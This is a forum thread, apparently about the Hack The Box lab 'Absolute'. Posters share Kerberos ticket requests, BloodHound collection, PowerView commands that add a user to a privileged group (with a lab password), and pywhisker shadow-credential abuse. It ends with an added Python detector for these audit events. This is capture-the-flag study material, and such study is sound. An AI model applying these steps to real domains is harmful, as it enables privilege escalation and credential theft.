Absolute - HTB [Discussion]
Fake?
Reply
(September 27, 2022, 09:03 AM)user_htb22 Wrote:
(September 27, 2022, 08:48 AM)ThatUsername Wrote:
(September 27, 2022, 07:16 AM)user_htb22 Wrote:
(September 27, 2022, 06:43 AM)Exa Wrote:
(September 25, 2022, 07:25 PM)user_htb22 Wrote: $ export KRB5CCNAME=svc_smb.ccache
$ impacket-smbclient [email protected] -k -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)


I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb


Does anyone have an idea why this is happening?

timedatectl set-ntp false
sudo ntpdate absolute.htb
watch u r time

smbclient won't work u need Kerberos auth

export KRB5CCNAME=svc_smb.ccache
use cme smb or impacket smbclient


(September 26, 2022, 09:19 PM)ThatUsername Wrote:
(September 25, 2022, 06:03 PM)jahman Wrote: Hello,

Via bloodhound :  m.lovegod -- OWNS --> Group Network Audit -- Generic Write --> winrm_user


How did you collect the data? With every version of Bloodhound ingestor I ran into a "Failure to authenticate with LDAP". Using  and his password.

Bloodhound.py | Sharphound.ps1 | Sharphound.exe

is failing.

i use this

git clone https://github.com/jazzpizazz/BloodHound.py-Kerberos.git
cd BloodHound.py-Kerberos/
export KRB5CCNAME=m.lovegod.ccache
./bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.214.131 --dns-tcp --zip -no-pass -c All


yeah, tested this version too. Worked flawlessly.

did u get winrm_user password ?


No. Was able to get the bloodhound data and map the attack path but powerview won't connect to DC with my windows machine.

Calculated aes256 hash of lovegod with Rubeus and spawned powershell process with the ticket but no success to use it for ownership attacks. Even with valid session / ticket
Reply
(September 27, 2022, 10:52 AM)ThatUsername Wrote:
(September 27, 2022, 09:03 AM)user_htb22 Wrote:
(September 27, 2022, 08:48 AM)ThatUsername Wrote:
(September 27, 2022, 07:16 AM)user_htb22 Wrote:
(September 27, 2022, 06:43 AM)Exa Wrote: I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb


Does anyone have an idea why this is happening?

timedatectl set-ntp false
sudo ntpdate absolute.htb
watch u r time

smbclient won't work u need Kerberos auth

export KRB5CCNAME=svc_smb.ccache
use cme smb or impacket smbclient


(September 26, 2022, 09:19 PM)ThatUsername Wrote: How did you collect the data? With every version of Bloodhound ingestor I ran into a "Failure to authenticate with LDAP". Using  and his password.

Bloodhound.py | Sharphound.ps1 | Sharphound.exe

is failing.

i use this

git clone https://github.com/jazzpizazz/BloodHound.py-Kerberos.git
cd BloodHound.py-Kerberos/
export KRB5CCNAME=m.lovegod.ccache
./bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.214.131 --dns-tcp --zip -no-pass -c All


yeah, tested this version too. Worked flawlessly.

did u get winrm_user password ?


No. Was able to get the bloodhound data and map the attack path but powerview won't connect to DC with my windows machine.

Calculated aes256 hash of lovegod with Rubeus and spawned powershell process with the ticket but no success to use it for ownership attacks. Even with valid session / ticket

Me too
Reply
(September 27, 2022, 10:52 AM)ThatUsername Wrote:
(September 27, 2022, 09:03 AM)user_htb22 Wrote:
(September 27, 2022, 08:48 AM)ThatUsername Wrote:
(September 27, 2022, 07:16 AM)user_htb22 Wrote:
(September 27, 2022, 06:43 AM)Exa Wrote: I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb


Does anyone have an idea why this is happening?

timedatectl set-ntp false
sudo ntpdate absolute.htb
watch u r time

smbclient won't work u need Kerberos auth

export KRB5CCNAME=svc_smb.ccache
use cme smb or impacket smbclient


(September 26, 2022, 09:19 PM)ThatUsername Wrote: How did you collect the data? With every version of Bloodhound ingestor I ran into a "Failure to authenticate with LDAP". Using  and his password.

Bloodhound.py | Sharphound.ps1 | Sharphound.exe

is failing.

i use this

git clone https://github.com/jazzpizazz/BloodHound.py-Kerberos.git
cd BloodHound.py-Kerberos/
export KRB5CCNAME=m.lovegod.ccache
./bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.214.131 --dns-tcp --zip -no-pass -c All


yeah, tested this version too. Worked flawlessly.

did u get winrm_user password ?


No. Was able to get the bloodhound data and map the attack path but powerview won't connect to DC with my windows machine.

Calculated aes256 hash of lovegod with Rubeus and spawned powershell process with the ticket but no success to use it for ownership attacks. Even with valid session / ticket

why don't u guys do in the windows vm , setup host file (C:\Windows\System32\drivers\etc\hosts) and then create tgt ticket with Rubeus (.\Rubeus.exe asktgt /enctype:AES256 /user:<username> /password:<password> /domain:absolute.htb /dc:dc.absolute.htb /ptt) and then  .\SharpHound.ps1; Invoke-BloodHound -Domain absolute.htb
Reply
(September 27, 2022, 06:43 AM)Exa Wrote:
(September 25, 2022, 07:25 PM)user_htb22 Wrote: $ export KRB5CCNAME=svc_smb.ccache
$ impacket-smbclient [email protected] -k -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)


I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb


Does anyone have an idea why this is happening?


Finally got this working. Apparently, dc.absolute.htb must be set as target (instead of absolute.htb or the IP address):

smbclient.py -k dc.absolute.htb
Reply
(September 27, 2022, 09:54 PM)Hacker2222 Wrote: with bloodhound result u can see path to winrmuser u need to add lovegod user to the group .then use genericwrite to edit shadow creds of winrmuser. just don't know how to add lovegod to group.  ............ tried windows powerview but isn't working..................


if someone finds how to add user to group . then u can prob use pywhisker to edit shadow cred


I was successfully able to add m.lovegod to the "network audit" group. But when I changed serviceprincipal name for the winrm_user I still get access denied.

Also, could not modify object via pywhisker
Reply
(September 28, 2022, 12:13 AM)Hacker2222 Wrote:
(September 27, 2022, 11:47 PM)samhub123 Wrote:
(September 27, 2022, 09:54 PM)Hacker2222 Wrote: with bloodhound result u can see path to winrmuser u need to add lovegod user to the group .then use genericwrite to edit shadow creds of winrmuser. just don't know how to add lovegod to group.  ............ tried windows powerview but isn't working..................


if someone finds how to add user to group . then u can prob use pywhisker to edit shadow cred


I was successfully able to add m.lovegod to the "network audit" group. But when I changed serviceprincipal name for the winrm_user I still get access denied.

Also, could not modify object via pywhisker


u run gettgt again ? maybe u need to refresh tgt .......... how do u add to network audit group ??? what command ?


(September 27, 2022, 11:47 PM)samhub123 Wrote:
(September 27, 2022, 09:54 PM)Hacker2222 Wrote: with bloodhound result u can see path to winrmuser u need to add lovegod user to the group .then use genericwrite to edit shadow creds of winrmuser. just don't know how to add lovegod to group.  ............ tried windows powerview but isn't working..................


if someone finds how to add user to group . then u can prob use pywhisker to edit shadow cred


I was successfully able to add m.lovegod to the "network audit" group. But when I changed serviceprincipal name for the winrm_user I still get access denied.

Also, could not modify object via pywhisker


and check if user is actually in the group JAJAJAJA


Yes they are,


GroupDomain            : absolute.htb
GroupName              : Network Audit
GroupDistinguishedName  : CN=Network Audit,CN=Users,DC=absolute,DC=htb
MemberDomain            : absolute.htb
MemberName              : svc_audit
MemberDistinguishedName : CN=svc_audit,CN=Users,DC=absolute,DC=htb
MemberObjectClass      : user
MemberSID              : S-1-5-21-4078382237-1492182817-2568127209-1115

GroupDomain            : absolute.htb
GroupName              : Network Audit
GroupDistinguishedName  : CN=Network Audit,CN=Users,DC=absolute,DC=htb
MemberDomain            : absolute.htb
MemberName              : m.lovegod
MemberDistinguishedName : CN=m.lovegod,CN=Users,DC=absolute,DC=htb
MemberObjectClass      : user
MemberSID              : S-1-5-21-4078382237-1492182817-2568127209-1109


I'll try refreshing TGT and report back
Reply
Okay, I was able to get ccache file for winrm_user using pywhisker.
From that I also got the NThash for winrm_user

but using CME with hash and also with the ticket, it seems like I cannot access winrm using winrm_user
Reply
(September 27, 2022, 07:16 AM)user_htb22 Wrote:
(September 27, 2022, 06:43 AM)Exa Wrote:
(September 25, 2022, 07:25 PM)user_htb22 Wrote: $ export KRB5CCNAME=svc_smb.ccache
$ impacket-smbclient [email protected] -k -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)


I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb


Does anyone have an idea why this is happening?

timedatectl set-ntp false
sudo ntpdate absolute.htb
watch u r time

smbclient won't work u need Kerberos auth

export KRB5CCNAME=svc_smb.ccache
use cme smb or impacket smbclient


(September 26, 2022, 09:19 PM)ThatUsername Wrote:
(September 25, 2022, 06:03 PM)jahman Wrote: Hello,

Via bloodhound :  m.lovegod -- OWNS --> Group Network Audit -- Generic Write --> winrm_user


How did you collect the data? With every version of Bloodhound ingestor I ran into a "Failure to authenticate with LDAP". Using  and his password.

Bloodhound.py | Sharphound.ps1 | Sharphound.exe

is failing.

i use this

git clone https://github.com/jazzpizazz/BloodHound.py-Kerberos.git
cd BloodHound.py-Kerberos/
export KRB5CCNAME=m.lovegod.ccache
./bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.214.131 --dns-tcp --zip -no-pass -c All


THX, it works
Reply
(September 28, 2022, 02:38 AM)Hacker2222 Wrote:
(September 28, 2022, 02:16 AM)samhub123 Wrote: Okay, I was able to get ccache file for winrm_user using pywhisker.
From that I also got the NThash for winrm_user

but using CME with hash and also with the ticket, it seems like I cannot access winrm using winrm_user


if u have ccache file then just use evilwinrm?? how did u add lovegod to the group tho?

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred


Let me know if you get winrm working.
Reply
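On the defensive side, the path discussed in this thread (a group owner granting itself rights on the group, adding itself as a member, then writing a key credential on another account) shows up in domain controller audit events 5136 and 4728/4732/4756. The following is an added example, not code from any poster: a Python triage function over exported Security log records. It assumes directory service change auditing is enabled; the records are constructed and reduced to the fields used, and the helpdesk1 and admin1 accounts, their SIDs, and the winrm_user DN are assumptions.

```python
# Added example: flag AD audit events matching the path discussed in the thread.
BASE = "CN=Users,DC=absolute,DC=htb"
LOVEGOD_SID = "S-1-5-21-4078382237-1492182817-2568127209-1109"  # from the thread output
GROUP_ADD_IDS = {4728, 4732, 4756}  # member added to global / local / universal group
VALUE_ADDED = "%%14674"             # 5136 OperationType meaning "Value Added"
WATCHED_ATTRS = {"msds-keycredentiallink": "key-credential-written",
                 "ntsecuritydescriptor": "dacl-changed"}

# Constructed, time-ordered sample records (not real logs), reduced to the fields used.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "m.lovegod", "OperationType": VALUE_ADDED,
     "ObjectDN": "CN=Network Audit," + BASE, "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4728, "SubjectUserName": "m.lovegod", "SubjectUserSid": LOVEGOD_SID,
     "MemberSid": LOVEGOD_SID, "TargetUserName": "Network Audit"},
    {"EventID": 5136, "SubjectUserName": "helpdesk1", "OperationType": VALUE_ADDED,
     "ObjectDN": "CN=svc_audit," + BASE, "AttributeLDAPDisplayName": "description"},
    {"EventID": 5136, "SubjectUserName": "m.lovegod", "OperationType": VALUE_ADDED,
     "ObjectDN": "CN=winrm_user," + BASE, "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 4728, "SubjectUserName": "admin1", "SubjectUserSid": "S-1-5-21-1-1-1-500",
     "MemberSid": "S-1-5-21-1-1-1-1200", "TargetUserName": "Network Audit"},
]

def classify(ev):
    """Return a finding label for one event, or None when it is not of interest."""
    eid = ev.get("EventID")
    member = ev.get("MemberSid")
    if eid in GROUP_ADD_IDS and member and member == ev.get("SubjectUserSid"):
        return "self-added-to-group"      # the account that made the change is the new member
    if eid == 5136 and ev.get("OperationType") == VALUE_ADDED:
        return WATCHED_ATTRS.get(ev.get("AttributeLDAPDisplayName", "").lower())
    return None

def findings(events):
    """List (subject, label, target) for every event that classify() flags."""
    out = []
    for ev in events:
        label = classify(ev)
        if label:
            out.append((ev["SubjectUserName"], label, ev.get("ObjectDN") or ev.get("TargetUserName")))
    return out

def chained_subjects(events):
    """Accounts that added themselves to a group and later wrote a key credential."""
    self_added, chained = set(), []
    for who, label, _ in findings(events):
        if label == "self-added-to-group":
            self_added.add(who)
        elif label == "key-credential-written" and who in self_added and who not in chained:
            chained.append(who)
    return chained
```

Writes to msDS-KeyCredentialLink also occur during legitimate Windows Hello for Business enrollment, so a production rule needs an allowlist of the accounts expected to perform them.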